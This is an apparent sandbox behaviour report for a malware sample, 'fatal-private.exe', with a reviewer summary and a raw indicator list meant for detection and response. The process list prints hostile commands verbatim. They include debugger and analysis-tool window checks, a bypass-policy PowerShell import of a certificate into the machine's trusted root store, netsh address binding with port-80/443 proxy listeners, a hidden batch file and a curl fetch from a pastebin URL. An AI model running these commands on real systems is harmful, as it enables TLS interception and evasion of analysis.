Technical Information

Reviewer summary (derived only from the entries below; the list itself is left verbatim for IOC extraction). The listing mixes the sample's own activity with ordinary Opera first-run noise (speeddials/partner fetches, favicon downloads, geolocation, crash reporter, SQLite `etilqs_*` temp files); filter the Opera lines before using this as an indicator set. The sample-specific behaviour is: (1) enumeration of analysis-tool window classes — OLLYDBG, x64dbg, IDA (`ida64`, `IDA v`, and the misspelled `The Interactive Dissembler`, reproduced as found), Wireshark, Fiddler, WinLister — i.e. an anti-analysis check; (2) self-hashing of `%TEMP%\fatal-private.exe` via `certutil -hashfile ... MD5` piped through `find`, which looks like an integrity/anti-tamper check; (3) a dropped `%LOCALAPPDATA%\k.bat` run from a hidden `cmd.exe`; (4) `powershell -ExecutionPolicy Bypass` importing `%TEMP%\server.crt` into `Cert:\LocalMachine\Root` (requires administrative rights) and a follow-up `certutil -store TrustedRoot | findstr` to confirm the import; (5) `net start iphlpsvc` followed by `netsh int ip add addr` binding the public addresses 51.79.86.198, 104.26.1.5, 104.26.0.5 and 172.67.72.57 to the local interface and `netsh interface portproxy add v4tov4` listeners on 0.0.0.0:80 and :443 — `connectaddress` is blank in this capture, so the proxy target was not observed, but a trusted root certificate plus local binding of remote addresses and an 80/443 portproxy is consistent with local traffic hijacking/TLS interception of whatever those addresses serve (the `findstr /R "^[0-9]*\.[0-9]*\.[0-9]*\.[0-9]*$"` step suggests the addresses are resolved at runtime rather than hard-coded); (6) `curl -s https://pastebin.com/raw/sD69ivJ5` fetching remote content whose body is not shown here; (7) `ipconfig /flushdns`; and (8) launching Opera to `https://discord.gg/fatalservices`. Outside browser noise, the only outbound endpoints are `ke##uth.win:443` and `<LOCALNET>.11.37:443`. For response: check the LocalMachine Root store for the imported certificate, the `netsh interface portproxy show all` and `netsh int ip show addr` state, and the `iphlpsvc` service start, as these persist after the process exits.
- ClassName: 'OLLYDBG', WindowName: ''
- %TEMP%\autb84.tmp
- %TEMP%\etilqs_9aukitrwv39swq4
- %TEMP%\etilqs_effepkllqnih9an
- %TEMP%\etilqs_bfefa3cm9g6llbb
- %TEMP%\etilqs_rn9eyqxwybdjfkj
- %TEMP%\etilqs_k10wioubt0idyfb
- %TEMP%\etilqs_yva6bqub0pjutfr
- %TEMP%\1bd2.tmp
- %TEMP%\etilqs_juacgj9ovtqnw3m
- %TEMP%\etilqs_gn5x9ltcjbfhgjl
- %TEMP%\etilqs_en0mdcm619inubr
- %TEMP%\etilqs_awf4fvzrp1fuwyh
- %LOCALAPPDATA%\k.bat
- %TEMP%\aut1342.tmp
- %TEMP%\fatal-private.exe
- nul
- %TEMP%\1bd3.tmp
- %TEMP%\autb84.tmp
- %TEMP%\aut1342.tmp
- %LOCALAPPDATA%\k.bat
- %TEMP%\1bd2.tmp
- %TEMP%\1bd3.tmp
- 'google.com':80
- 'localhost':49262
- 'localhost':49260
- 'do#####d3.operacdn.com':443
- 'sd#####es.operacdn.com':443
- 'fa###ook.com':443
- 'fa###ook.com':80
- 'di##ord.gg':443
- 'ya###.opera.com':80
- 'si#####ck2.opera.com':443
- 're###.opera.com':80
- 'si#####ck2.opera.com':80
- 'en.###ipedia.org':443
- 'en.###ipedia.org':80
- 'se####.yahoo.com':443
- 'am##on.com':443
- 'au######te.geo.opera.com':443
- 'bing.com':80
- 'am##on.com':80
- 'du###uckgo.com':443
- 'au######te.geo.opera.com':80
- 'se####.yahoo.com':80
- 'ke##uth.win':443
- '<LOCALNET>.11.37':443
- http://www.google.com/favicon.ico
- http://re###.opera.com/speeddials/partner/product
- http://re###.opera.com/speeddials/partner/booking_com_us
- http://re###.opera.com/speeddials/partner/twitter_us
- http://re###.opera.com/speeddials/partner/yahoo
- http://re###.opera.com/speeddials/partner/ebay_us
- http://re###.opera.com/speeddials/partner/amazon_us
- http://www.fa###ook.com/
- http://re###.opera.com/speeddials/partner/youtube
- http://re###.opera.com/speeddials/partner/facebook
- http://re###.opera.com/www.opera.com/firstrun/
- http://si#####ck2.opera.com/?ho###################################################
- http://en.###ipedia.org/favicon.ico
- http://www.bing.com/s/a/bing_p.ico
- http://www.am##on.com/favicon.ico
- http://se####.yahoo.com/favicon.ico
- http://au######te.geo.opera.com/geolocation/
- http://ya###.opera.com/favicon.ico
- http://re###.opera.com/speeddials/partner/wikipedia_org_us
- 'du###uckgo.com':443
- 'localhost':49263
- 'localhost':49262
- 'localhost':49260
- 'do#####d3.operacdn.com':443
- 'sd#####es.operacdn.com':443
- 'fa###ook.com':443
- 'ke##uth.win':443
- 'op##a.com':443
- 'ya###.opera.com':443
- 'si#####ck2.opera.com':443
- 'en.###ipedia.org':443
- 'se####.yahoo.com':443
- 'am##on.com':443
- 'au######te.geo.opera.com':443
- 'di##ord.gg':443
- '<LOCALNET>.11.37':443
- DNS ASK en.###ipedia.org
- DNS ASK sd#####es.operacdn.com
- DNS ASK fa###ook.com
- DNS ASK di##ord.gg
- DNS ASK op##a.com
- DNS ASK ya###.opera.com
- DNS ASK re###.opera.com
- DNS ASK si#####ck2.opera.com
- DNS ASK ke##uth.win
- DNS ASK bi##.#ikimedia.org
- DNS ASK bing.com
- DNS ASK am##on.com
- DNS ASK du###uckgo.com
- DNS ASK se####.yahoo.com
- DNS ASK au######te.geo.opera.com
- DNS ASK google.com
- DNS ASK do#####d3.operacdn.com
- 'localhost':64746
- ClassName: 'Opera_MessageWindow' WindowName: '%APPDATA%\Opera Software\Opera Stable'
- ClassName: 'WinListerMain' WindowName: ''
- ClassName: 'ID' WindowName: ''
- ClassName: 'x64dbg' WindowName: ''
- ClassName: 'XTPMainFrame' WindowName: ''
- ClassName: 'Progress Telerik Fiddler Classic' WindowName: ''
- ClassName: 'The Wireshark Network Analyzer' WindowName: ''
- ClassName: 'SunAwtFrame' WindowName: ''
- ClassName: 'The Interactive Dissembler' WindowName: ''
- ClassName: 'IDA v' WindowName: ''
- ClassName: 'ida64' WindowName: ''
- '%TEMP%\fatal-private.exe'
- '%TEMP%\fatal-private.exe' 3428
- '%WINDIR%\syswow64\cmd.exe' /c %LOCALAPPDATA%\k.bat (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %LOCALAPPDATA%\k.bat
- '%ProgramFiles(x86)%\opera\29.0.1795.47\opera.exe' --type=utility --channel="2876.6.315397323\229180363" --lang=en-US --enable-proprietary-media-types-playback --ignored=" --type=renderer " /prefetch:-645351001
- '%ProgramFiles(x86)%\opera\29.0.1795.47\opera.exe' --type=utility --channel="2876.7.764465488\630352264" --lang=en-US --enable-proprietary-media-types-playback --ignored=" --type=renderer " /prefetch:-645351001
- '%ProgramFiles(x86)%\opera\29.0.1795.47\opera.exe' --type=utility --channel="2876.8.170670964\1053318140" --lang=en-US --enable-proprietary-media-types-playback --ignored=" --type=renderer " /prefetch:-645351001
- '%ProgramFiles(x86)%\opera\29.0.1795.47\opera_crashreporter.exe' --type=utility --channel="2876.4.1644801679\672980057" --lang=en-US --no-sandbox --enable-proprietary-media-types-playback /prefetch:-645351001 /crash-reporter-parent-id=1888
- '%ProgramFiles(x86)%\opera\29.0.1795.47\opera.exe' --type=utility --channel="2876.9.1787241317\2131108185" --lang=en-US --enable-proprietary-media-types-playback --ignored=" --type=renderer " /prefetch:-645351001
- '%ProgramFiles(x86)%\opera\29.0.1795.47\opera.exe' --type=utility --channel="2876.10.1015003953\522010583" --lang=en-US --enable-proprietary-media-types-playback --ignored=" --type=renderer " /prefetch:-645351001
- '%ProgramFiles(x86)%\opera\29.0.1795.47\opera.exe' --type=utility --channel="2876.4.1644801679\672980057" --lang=en-US --no-sandbox --enable-proprietary-media-types-playback /prefetch:-645351001
- '%ProgramFiles(x86)%\opera\29.0.1795.47\opera.exe' --type=utility --channel="2876.5.534682749\1423778838" --lang=en-US --enable-proprietary-media-types-playback --ignored=" --type=renderer " /prefetch:-645351001
- '%ProgramFiles(x86)%\opera\29.0.1795.47\opera.exe' --type=utility --channel="2876.11.105359283\2120541637" --lang=en-US --enable-proprietary-media-types-playback --ignored=" --type=renderer " /prefetch:-645351001
- '%WINDIR%\syswow64\ipconfig.exe' /flushdns
- '<SYSTEM32>\cmd.exe' /c certutil -hashfile "%TEMP%\Fatal-Private.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
- '<SYSTEM32>\certutil.exe' -hashfile "%TEMP%\Fatal-Private.exe" MD5
- '<SYSTEM32>\find.exe' /i /v "md5"
- '<SYSTEM32>\find.exe' /i /v "certutil"
- '%ProgramFiles(x86)%\opera\29.0.1795.47\opera.exe' --type=utility --channel="2876.16.1944470022\1760537212" --lang=en-US --enable-proprietary-media-types-playback --ignored=" --type=renderer " /prefetch:-645351001
- '%ProgramFiles(x86)%\opera\29.0.1795.47\opera.exe' --type=utility --channel="2876.12.1755772901\837564539" --lang=en-US --enable-proprietary-media-types-playback --ignored=" --type=renderer " /prefetch:-645351001
- '%ProgramFiles(x86)%\opera\29.0.1795.47\opera.exe' --type=utility --channel="2876.15.358362856\680489109" --lang=en-US --enable-proprietary-media-types-playback --ignored=" --type=renderer " /prefetch:-645351001
- '%ProgramFiles(x86)%\opera\29.0.1795.47\opera.exe' --type=renderer --alt-high-dpi-setting=96 --disable-direct-npapi-requests --enable-deferred-image-decoding --lang=en-US --enable-proprietary-media-types-playback --extension-process --enable-we...
- '%ProgramFiles(x86)%\opera\29.0.1795.47\opera.exe' --type=renderer --alt-high-dpi-setting=96 --disable-direct-npapi-requests --enable-deferred-image-decoding --lang=en-US --enable-proprietary-media-types-playback --disable-client-side-phishing-...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -Command "Import-Certificate -FilePath '%TEMP%\server.crt' -CertStoreLocation 'Cert:\LocalMachine\Root' -ErrorAction SilentlyContinue"
- '%WINDIR%\syswow64\net.exe' start iphlpsvc
- '%WINDIR%\syswow64\net1.exe' start iphlpsvc
- '%WINDIR%\syswow64\cmd.exe' /c curl -s https://pastebin.com/raw/sD69ivJ5
- '%ProgramFiles(x86)%\opera\29.0.1795.47\opera.exe' -noautoupdate --ran-launcher -- https://discord.gg/fatalservices
- '%WINDIR%\syswow64\cmd.exe' /S /D /c" echo "
- '%WINDIR%\syswow64\findstr.exe' /R "^[0-9]*\.[0-9]*\.[0-9]*\.[0-9]*$"
- '%WINDIR%\syswow64\netsh.exe' int ip add addr 1 51.79.86.198/32 st=ac sk=tr
- '%ProgramFiles(x86)%\opera\launcher.exe' -noautoupdate -- "https://discord.gg/fatalservices"
- '%ProgramFiles(x86)%\opera\29.0.1795.47\opera_crashreporter.exe' -noautoupdate --ran-launcher -- https://discord.gg/fatalservices /crash-reporter-parent-id=2876
- '%WINDIR%\syswow64\netsh.exe' int ip add addr 1 104.26.1.5/32 st=ac sk=tr
- '%WINDIR%\syswow64\netsh.exe' int ip add addr 1 104.26.0.5/32 st=ac sk=tr
- '%WINDIR%\syswow64\netsh.exe' interface portproxy add v4tov4 listenport=80 listenaddress=0.0.0.0 connectport=80 connectaddress=
- '%ProgramFiles(x86)%\opera\29.0.1795.47\opera.exe' --type=gpu-process --channel="2876.0.1063720798\587710536" --enable-proprietary-media-types-playback --supports-dual-gpus=false --gpu-driver-bug-workarounds=1,19,42 --gpu-vendor-id=0x0000 --gpu...
- '%WINDIR%\syswow64\netsh.exe' interface portproxy add v4tov4 listenport=443 listenaddress=0.0.0.0 connectport=443 connectaddress=
- '%WINDIR%\syswow64\certutil.exe' -store TrustedRoot
- '%WINDIR%\syswow64\findstr.exe' /i /c:"%TEMP%\server.crt"
- '%WINDIR%\syswow64\netsh.exe' int ip add addr 1 172.67.72.57/32 st=ac sk=tr
- '%ProgramFiles(x86)%\opera\29.0.1795.47\opera.exe' --type=utility --channel="2876.17.1990539497\496958295" --lang=en-US --enable-proprietary-media-types-playback --ignored=" --type=renderer " /prefetch:-645351001
- '%ProgramFiles(x86)%\opera\29.0.1795.47\opera.exe' --type=utility --channel="2876.18.1804343518\652121414" --lang=en-US --enable-proprietary-media-types-playback --ignored=" --type=renderer " /prefetch:-645351001